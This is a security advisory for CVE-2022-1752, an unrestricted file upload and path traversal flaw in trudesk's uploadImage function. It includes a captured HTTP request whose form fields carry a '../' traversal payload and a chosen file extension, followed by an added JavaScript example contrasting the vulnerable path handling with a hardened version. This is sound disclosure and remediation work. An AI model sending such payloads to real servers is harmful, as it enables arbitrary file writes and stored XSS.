Headline
CVE-2022-1752: Unrestricted File Upload and Path Traversal in upload image in trudesk
Unrestricted Upload of File with Dangerous Type in GitHub repository polonel/trudesk prior to 1.2.2.
Description
The uploadImage function in accountsController takes the file path and extension from user input. An attacker can change the path and extension to upload a dangerous file anywhere on the server.
Proof of Concept
1. Login
2. Upload profile image
3. Capture request, modify `username` and `filename`
```http
POST /accounts/uploadImage HTTP/1.1
Host: 192.168.20.132:8118
Content-Length: 452
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXoDBooqQ26crHR0
Origin: http://192.168.20.132:8118
Referer: http://192.168.20.132:8118/accounts
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3A01nLIvLiz-oEhbSpekE9nwUSl9R_PQF1.GeCCIcToZnO%2BDlTis77aXBlVGyVOaQDURoUrIcrXQ%2BM; $trudesk%3Atimezone=America/New_York
Connection: close

------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="username"

/../../../../../../testpathtravesal1
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="_id"

627ce4cd7778b2c5b5f49851
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="image"; filename="filename.anything"
Content-Type: image/jpeg

<image content>
------WebKitFormBoundaryQXoDBooqQ26crHR0--
```
Impact
An authenticated user can upload a dangerous file anywhere on the server (for example, uploading a file with an .html extension leads to stored XSS).
Occurrences
accounts.js L485-L505
This function passes object.username into path.join(), which leads to path traversal, and takes the extension from path.extname(filename), which allows uploading a file with a dangerous type.
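The path construction described above beside a hardened form, as an added example (not trudesk's code or its fix). `UPLOAD_DIR`, the `avatar_` prefix, the allowlists and all function names are assumptions made for illustration.

```javascript
// Added example: hypothetical names throughout, not trudesk's code.
const path = require('path').posix; // posix flavour so results match on any OS

const UPLOAD_DIR = '/srv/app/public/uploads/users'; // assumed upload root
const ALLOWED_EXT = new Set(['.jpg', '.jpeg', '.png', '.gif']); // assumed allowlist
const USERNAME_RE = /^[A-Za-z0-9._-]{1,64}$/; // no separators, no empty value

// Pattern the advisory describes: both the name part and the extension
// come straight from the multipart form fields.
function naiveAvatarPath(username, filename) {
  return path.join(UPLOAD_DIR, 'avatar_' + username + path.extname(filename));
}

// Hardened form: validate each part, then confirm containment.
function safeAvatarPath(username, filename) {
  if (typeof username !== 'string' || !USERNAME_RE.test(username)) {
    throw new Error('invalid username');
  }
  const ext = path.extname(String(filename)).toLowerCase();
  if (!ALLOWED_EXT.has(ext)) {
    throw new Error('extension not allowed: ' + ext);
  }
  const full = path.resolve(UPLOAD_DIR, 'avatar_' + username + ext);
  // Defence in depth: the resolved path must still sit under the upload root.
  if (!full.startsWith(UPLOAD_DIR + path.sep)) {
    throw new Error('path escapes upload directory');
  }
  return full;
}

// Helper for checks: true when fn throws.
function rejected(fn) {
  try { fn(); return false; } catch (e) { return true; }
}
```

In a real handler the username should be taken from the authenticated session rather than from a form field, and the file content should be checked against the declared image type as well as the extension.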